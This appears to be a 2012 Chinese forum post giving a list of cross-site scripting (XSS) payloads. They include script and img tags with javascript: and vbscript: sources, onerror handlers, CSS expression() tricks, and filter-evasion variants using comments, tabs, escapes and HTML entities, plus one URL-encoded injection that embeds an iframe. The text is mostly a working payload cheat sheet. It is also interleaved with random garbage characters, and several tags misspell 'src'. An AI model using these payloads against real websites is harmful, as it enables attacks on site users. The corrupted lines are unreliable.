<script>alert("跨站")</script> (最常用)
Q5 ^5 F' s- _6 M1 ~0 D<img scr=javascript:alert("跨站")></img>
' i) }! E+ B5 E1 j5 ]1 l" G<img scr="javascript: alert(/跨站/)></img>% F+ [- A% o% c1 N! v
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)4 [ C7 l9 ~, y$ l
<img scr="#" onerror=alert(/跨站/)></img>
, A( E3 Y0 v" D+ T( \: f+ n* p<img scr="#" style="xss:expression(alert(/xss/));"></img>& A/ `0 m$ ^% }% c
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)- O1 x2 J3 D2 c6 Q3 I* k$ d' m
<img src=vbscript:msgbox ("xss")></img>6 w! _7 U% [7 B
<style> input {left:expression (alert('xss'))}</style>
; h5 W/ E S7 I3 O" e<div style={left:expression (alert('xss'))}></div>, B! B9 Z( _6 S& ~, C
<div style={left:exp/* */ression (alert('xss'))}></div>. m+ X2 C& j- l7 V) T
<div style={left:\0065\0078ression (alert('xss'))}></div># o: k! q2 @9 G6 d& n3 K
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>- I1 }# V4 }6 w
unicode <div style="{left:expRessioN (alert('xss'))}">& K4 j& x! y1 D9 G/ S
# S% l/ {6 J) K. K( Z- y, I9 r3 J"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
/ G. M( @% l% |$ j8 e' D% |6 b |
发表于 2012-9-13 17:15:04
收藏
支持
反对